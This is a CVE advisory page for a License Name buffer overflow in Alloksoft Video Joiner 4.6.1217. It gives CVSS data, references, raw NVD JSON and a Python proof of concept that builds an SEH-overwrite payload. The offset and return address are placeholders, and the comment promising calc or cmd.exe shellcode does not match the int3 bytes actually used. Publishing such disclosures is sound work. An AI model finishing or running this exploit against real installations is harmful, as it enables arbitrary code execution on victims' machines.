CVE-2018-25315

Description

Alloksoft Video joiner 4.6.1217 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Name field. Attackers can craft a payload with structured exception handler (SEH) overwrite and shellcode to achieve code execution when the application processes the license registration input.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Alloksoft Video Joiner 4.6.1217

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys
import struct

# Buffer overflow PoC for CVE-2018-25315
# Exploits SEH overwrite in Alloksoft Video Joiner 4.6.1217

def generate_payload():
    # Offset to SEH handler (example value, adjust based on debugging)
    offset = 408
    
    # SEH overwrite pattern
    # pop pop ret address from a non-ASLR module (e.g., os specific)
    # This is a placeholder address for demonstration
    seh_handler = struct.pack('<L', 0x1001FFFF) 
    
    # Short jump to shellcode (6 bytes back)
    nseh = b"\xeb\x06\x90\x90"
    
    # Simple calc shellcode (Windows exec cmd.exe)
    # Placeholder shellcode
    shellcode = b"\x90" * 8 + b"\xcc\xcc\xcc\xcc" 
    
    # Padding to reach offset
    padding = b"A" * offset
    
    # Remaining padding to fill the buffer
    remaining = b"C" * (500 - len(padding) - len(nseh) - len(seh_handler) - len(shellcode))
    
    payload = padding + nseh + seh_handler + shellcode + remaining
    return payload

if __name__ == "__main__":
    print("[+] Generating malicious payload for License Name field...")
    payload = generate_payload()
    print(f"[+] Payload length: {len(payload)}")
    # Use this string in the License Name field to trigger the crash/exploit
    print(payload.decode('latin-1'))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25315
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25315
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25315/
[4] VulDB https://vuldb.com/cve/CVE-2018-25315
[5] http://www.alloksoft.com
[6] http://www.alloksoft.com/joiner.htm
[7] https://www.exploit-db.com/exploits/44364
[8] https://www.vulncheck.com/advisories/alloksoft-video-joiner-buffer-overflow-via-license-name

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25315", "sourceIdentifier": "[email protected]", "published": "2026-04-29T20:16:27.363", "lastModified": "2026-04-29T21:22:20.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Alloksoft Video joiner 4.6.1217 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Name field. Attackers can craft a payload with structured exception handler (SEH) overwrite and shellcode to achieve code execution when the application processes the license registration input."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "http://www.alloksoft.com", "source": "[email protected]"}, {"url": "http://www.alloksoft.com/joiner.htm", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/44364", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/alloksoft-video-joiner-buffer-overflow-via-license-name", "source": "[email protected]"}]}}